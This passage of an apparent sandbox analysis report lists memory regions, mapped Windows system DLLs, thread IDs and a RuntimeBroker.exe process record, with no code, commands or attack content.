0x7ff8fc7b7fff monitored = 0 entry_point = 0x7ff8fc5fba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5766 start_va = 0x7ff8fd1f0000 end_va = 0x7ff8fd29cfff monitored = 0 entry_point = 0x7ff8fd2081a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5767 start_va = 0xf0000 end_va = 0x1adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5768 start_va = 0x7ff8fe0a0000 end_va = 0x7ff8fe13cfff monitored = 0 entry_point = 0x7ff8fe0a78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5769 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5770 start_va = 0x7ff8fccd0000 end_va = 0x7ff8fcf4cfff monitored = 0 entry_point = 0x7ff8fcda4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5771 start_va = 0x7ff8fcfc0000 end_va = 0x7ff8fd0dbfff monitored = 0 entry_point = 0x7ff8fd0002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5772 start_va = 0x7ff8fc870000 end_va = 0x7ff8fc8d9fff monitored = 0 entry_point = 0x7ff8fc8a6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5773 start_va = 0x7ff8fe040000 end_va = 0x7ff8fe09afff monitored = 0 entry_point = 0x7ff8fe0538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5774 start_va = 0x7ff8fdc10000 end_va = 0x7ff8fdcb6fff monitored = 0 entry_point = 0x7ff8fdc258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5779 start_va = 0x7ff8fb440000 end_va = 0x7ff8fb470fff monitored = 0 entry_point = 0x7ff8fb447d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 5780 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5781 start_va = 0x7ff8f9f10000 end_va = 0x7ff8f9fcdfff monitored = 0 entry_point = 0x7ff8f9f52d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 5789 start_va = 0x7ff8f3f90000 end_va = 0x7ff8f4217fff monitored = 0 entry_point = 0x7ff8f3fef670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 5795 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5796 start_va = 0x7ff8fbf40000 end_va = 0x7ff8fbf4efff monitored = 0 entry_point = 0x7ff8fbf43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5797 start_va = 0x7ff8fda00000 end_va = 0x7ff8fdb55fff monitored = 0 entry_point = 0x7ff8fda0a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5798 start_va = 0x7ff8fd870000 end_va = 0x7ff8fd9f5fff monitored = 0 entry_point = 0x7ff8fd8bffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5799 start_va = 0x7ff8fc9b0000 end_va = 0x7ff8fca64fff monitored = 0 entry_point = 0x7ff8fc9f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5800 start_va = 0x7ff8f70e0000 end_va = 0x7ff8f7215fff monitored = 0 entry_point = 0x7ff8f710f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 5801 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5802 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5803 start_va = 0x500000 end_va = 0x538fff monitored = 0 entry_point = 0x5012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5804 start_va = 0x670000 end_va = 0x7f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 5805 start_va = 0x7ff8fd6d0000 end_va = 0x7ff8fd70afff monitored = 0 entry_point = 0x7ff8fd6d12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5806 start_va = 0x800000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 5807 start_va = 0x990000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 5808 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5809 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 5810 start_va = 0x1d90000 end_va = 0x1e6cfff monitored = 0 entry_point = 0x1dee0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5817 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 5818 start_va = 0x7ff8fdb60000 end_va = 0x7ff8fdc06fff monitored = 0 entry_point = 0x7ff8fdb6b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5819 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 5820 start_va = 0x7ff8f3e60000 end_va = 0x7ff8f3e7dfff monitored = 0 entry_point = 0x7ff8f3e65340 region_type = mapped_file name = "desktopshellext.dll" filename = "\\Windows\\System32\\DesktopShellExt.dll" (normalized: "c:\\windows\\system32\\desktopshellext.dll") Region: id = 5822 start_va = 0x7ff8f3d70000 end_va = 0x7ff8f3d81fff monitored = 0 entry_point = 0x7ff8f3d75110 region_type = mapped_file name = "windows.shell.servicehostbuilder.dll" filename = "\\Windows\\System32\\Windows.Shell.ServiceHostBuilder.dll" (normalized: "c:\\windows\\system32\\windows.shell.servicehostbuilder.dll") Region: id = 5825 start_va = 0x1d90000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 5826 start_va = 0x1e90000 end_va = 0x1f6cfff monitored = 0 entry_point = 0x1eee0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5830 start_va = 0x1e90000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 5831 start_va = 0x1f10000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 5832 start_va = 0x1f90000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 5833 start_va = 0x7ff8f95c0000 end_va = 0x7ff8f9a52fff monitored = 0 entry_point = 0x7ff8f95cf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 5834 start_va = 0x7ff8f3c90000 end_va = 0x7ff8f3d69fff monitored = 0 entry_point = 0x7ff8f3ce03b0 region_type = mapped_file name = "modernexecserver.dll" filename = "\\Windows\\System32\\modernexecserver.dll" (normalized: "c:\\windows\\system32\\modernexecserver.dll") Region: id = 5844 start_va = 0x7ff8fdf10000 end_va = 0x7ff8fdfd0fff monitored = 0 entry_point = 0x7ff8fdf30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5845 start_va = 0x7ff8fbef0000 end_va = 0x7ff8fbf3afff monitored = 0 entry_point = 0x7ff8fbef35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5846 start_va = 0x7ff8facb0000 end_va = 0x7ff8facd9fff monitored = 0 entry_point = 0x7ff8facb8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 5847 start_va = 0x7ff8f3b70000 end_va = 0x7ff8f3bbafff monitored = 0 entry_point = 0x7ff8f3b87b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 5848 start_va = 0x7ff8faa10000 end_va = 0x7ff8fab0ffff monitored = 0 entry_point = 0x7ff8faa50f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 5849 start_va = 0x7ff8fbd80000 end_va = 0x7ff8fbda8fff monitored = 0 entry_point = 0x7ff8fbd94530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5852 start_va = 0x7ff8f87b0000 end_va = 0x7ff8f8841fff monitored = 0 entry_point = 0x7ff8f87fa780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 5853 start_va = 0x2010000 end_va = 0x2152fff monitored = 0 entry_point = 0x2038210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5854 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 5855 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 5856 start_va = 0x2010000 end_va = 0x20effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5906 start_va = 0x20f0000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 5907 start_va = 0x7ff8fa870000 end_va = 0x7ff8fa905fff monitored = 0 entry_point = 0x7ff8fa895570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5908 start_va = 0x2170000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 5911 start_va = 0x7ff8f3ae0000 end_va = 0x7ff8f3b10fff monitored = 0 entry_point = 0x7ff8f3ae3400 region_type = mapped_file name = "clipboardserver.dll" filename = "\\Windows\\System32\\ClipboardServer.dll" (normalized: "c:\\windows\\system32\\clipboardserver.dll") Region: id = 5912 start_va = 0x7ff8f3a80000 end_va = 0x7ff8f3adcfff monitored = 0 entry_point = 0x7ff8f3a90080 region_type = mapped_file name = "activationmanager.dll" filename = "\\Windows\\System32\\ActivationManager.dll" (normalized: "c:\\windows\\system32\\activationmanager.dll") Region: id = 5913 start_va = 0x7ff8f3a50000 end_va = 0x7ff8f3a72fff monitored = 0 entry_point = 0x7ff8f3a53020 region_type = mapped_file name = "appointmentactivation.dll" filename = "\\Windows\\System32\\AppointmentActivation.dll" (normalized: "c:\\windows\\system32\\appointmentactivation.dll") Region: id = 5914 start_va = 0x2170000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 5915 start_va = 0x2280000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 5916 start_va = 0x7ff8fdd40000 end_va = 0x7ff8fde82fff monitored = 0 entry_point = 0x7ff8fdd68210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5923 start_va = 0x7ff8f51f0000 end_va = 0x7ff8f5230fff monitored = 0 entry_point = 0x7ff8f51f4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 5924 start_va = 0x21f0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 5925 start_va = 0x7ff8f56a0000 end_va = 0x7ff8f56affff monitored = 0 entry_point = 0x7ff8f56a2c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 5927 start_va = 0x2290000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 5928 start_va = 0x2310000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 5929 start_va = 0x2410000 end_va = 0x2c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5930 start_va = 0x2c10000 end_va = 0x2c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c10000" filename = "" Region: id = 5935 start_va = 0x2c90000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 5937 start_va = 0x2d10000 end_va = 0x2d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 5938 start_va = 0x7ff8f3730000 end_va = 0x7ff8f3773fff monitored = 0 entry_point = 0x7ff8f373c010 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 5948 start_va = 0x7ff8f3700000 end_va = 0x7ff8f370dfff monitored = 0 entry_point = 0x7ff8f3702690 region_type = mapped_file name = "notificationplatformcomponent.dll" filename = "\\Windows\\System32\\notificationplatformcomponent.dll" (normalized: "c:\\windows\\system32\\notificationplatformcomponent.dll") Region: id = 5949 start_va = 0x7ff8f3600000 end_va = 0x7ff8f3696fff monitored = 0 entry_point = 0x7ff8f3614fd0 region_type = mapped_file name = "appcontracts.dll" filename = "\\Windows\\System32\\AppContracts.dll" (normalized: "c:\\windows\\system32\\appcontracts.dll") Region: id = 5950 start_va = 0x7ff8f3540000 end_va = 0x7ff8f35e1fff monitored = 0 entry_point = 0x7ff8f3542b20 region_type = mapped_file name = "sharehost.dll" filename = "\\Windows\\System32\\ShareHost.dll" (normalized: "c:\\windows\\system32\\sharehost.dll") Region: id = 5951 start_va = 0x7ff8fdfe0000 end_va = 0x7ff8fe031fff monitored = 0 entry_point = 0x7ff8fdfef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5952 start_va = 0x7ff8fbf80000 end_va = 0x7ff8fc5c3fff monitored = 0 entry_point = 0x7ff8fc1464b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5953 start_va = 0x7ff8fc940000 end_va = 0x7ff8fc982fff monitored = 0 entry_point = 0x7ff8fc954b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5954 start_va = 0x7ff8fbf50000 end_va = 0x7ff8fbf63fff monitored = 0 entry_point = 0x7ff8fbf552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5955 start_va = 0x7ff8f3530000 end_va = 0x7ff8f3538fff monitored = 0 entry_point = 0x7ff8f3531480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 5956 start_va = 0x7ff8f3510000 end_va = 0x7ff8f3524fff monitored = 0 entry_point = 0x7ff8f3511ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 5957 start_va = 0x7ff8f32b0000 end_va = 0x7ff8f350cfff monitored = 0 entry_point = 0x7ff8f3338610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 5964 start_va = 0x2d90000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 5965 start_va = 0x2e10000 end_va = 0x2e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 5967 start_va = 0x7ff8fb8d0000 end_va = 0x7ff8fb8e6fff monitored = 0 entry_point = 0x7ff8fb8d79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5968 start_va = 0x7ff8fb560000 end_va = 0x7ff8fb593fff monitored = 0 entry_point = 0x7ff8fb57ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5969 start_va = 0x2e90000 end_va = 0x31c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5970 start_va = 0x7ff8fb9f0000 end_va = 0x7ff8fb9fafff monitored = 0 entry_point = 0x7ff8fb9f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5971 start_va = 0x31d0000 end_va = 0x324ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 5972 start_va = 0x7ff8f31c0000 end_va = 0x7ff8f31d0fff monitored = 0 entry_point = 0x7ff8f31c5e90 region_type = mapped_file name = "licensemanagerapi.dll" filename = "\\Windows\\System32\\LicenseManagerApi.dll" (normalized: "c:\\windows\\system32\\licensemanagerapi.dll") Thread: id = 371 os_tid = 0x5c0 Thread: id = 375 os_tid = 0x5d4 Thread: id = 377 os_tid = 0x5dc Thread: id = 381 os_tid = 0x5f8 Thread: id = 384 os_tid = 0x604 Thread: id = 385 os_tid = 0x608 Thread: id = 393 os_tid = 0x630 Thread: id = 394 os_tid = 0x638 Thread: id = 395 os_tid = 0x63c Thread: id = 396 os_tid = 0x640 Thread: id = 397 os_tid = 0x644 Thread: id = 399 os_tid = 0x654 Thread: id = 401 os_tid = 0x660 Thread: id = 403 os_tid = 0x68c Thread: id = 404 os_tid = 0x6a0 Thread: id = 405 os_tid = 0x6b8 Process: id = "89" image_name = "runtimebroker.exe" filename = "c:\\windows\\system32\\runtimebroker.exe" page_root = "0x15a1b000" os_pid = "0x60c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "87" os_parent_pid = "0x270" cmd_line = "C:\\Windows\\System32\\RuntimeBroker.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010b7c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5857 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5858 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5859 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5860 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5861 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5862 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 5863 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5864 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5865 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5866 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5867 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5868 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5869 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5870 start_va = 0x510000 end_va = 0x516fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 5871 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 5872 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 5873 start_va = 0x700000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 5874 start_va = 0x780000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 5875 start_va = 0x840000 end_va = 0x846fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 5876 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 5877 start_va = 0xa00000 end_va = 0xb87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 5878 start_va = 0xb90000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 5879 start_va = 0xd20000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 5880 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5881 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 5882 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 5883 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 5884 start_va = 0x7ff61e190000 end_va = 0x7ff61e1a6fff monitored = 0 entry_point = 0x7ff61e1944f0 region_type = mapped_file name = "runtimebroker.exe" filename = "\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe") Region: id = 5885 start_va = 0x7ff8fbef0000 end_va = 0x7ff8fbf3afff monitored = 0 entry_point = 0x7ff8fbef35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5886 start_va = 0x7ff8fbf40000 end_va = 0x7ff8fbf4efff monitored = 0 entry_point = 0x7ff8fbf43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5887 start_va = 0x7ff8fc5d0000 end_va = 0x7ff8fc7b7fff monitored = 0 entry_point = 0x7ff8fc5fba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5888 start_va = 0x7ff8fc870000 end_va = 0x7ff8fc8d9fff monitored = 0 entry_point = 0x7ff8fc8a6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5889 start_va = 0x7ff8fccd0000 end_va = 0x7ff8fcf4cfff monitored = 0 entry_point = 0x7ff8fcda4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5890 start_va = 0x7ff8fcfc0000 end_va = 0x7ff8fd0dbfff monitored = 0 entry_point = 0x7ff8fd0002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5891 start_va = 0x7ff8fd1f0000 end_va = 0x7ff8fd29cfff monitored = 0 entry_point = 0x7ff8fd2081a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5892 start_va = 0x7ff8fd6d0000 end_va = 0x7ff8fd70afff monitored = 0 entry_point = 0x7ff8fd6d12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5893 start_va = 0x7ff8fd870000 end_va = 0x7ff8fd9f5fff monitored = 0 entry_point = 0x7ff8fd8bffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5894 start_va = 0x7ff8fda00000 end_va = 0x7ff8fdb55fff monitored = 0 entry_point = 0x7ff8fda0a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id 